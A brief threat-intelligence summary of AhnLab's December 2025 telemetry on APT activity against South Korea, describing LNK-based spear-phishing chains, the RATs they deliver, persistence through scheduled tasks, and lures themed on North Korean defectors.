AhnLab’s December 2025 South Korea APT telemetry found spear phishing as the dominant delivery method, with LNK-based attacks accounting for the largest share of observed activity. The LNK chains executed malicious PowerShell commands to download payloads through services such as Dropbox API or Google Drive, or to create local scripts and obfuscated RAT malware under paths such as %PUBLIC%. Final payloads included XenoRAT and RoKRAT, with attacker-controlled functions such as keylogging and screen capture. A second LNK pattern downloaded AutoIt malware, renamed curl.exe for execution, registered scheduled tasks for persistence, and used lures including North Korean defector support and North Korean human-rights academy documents.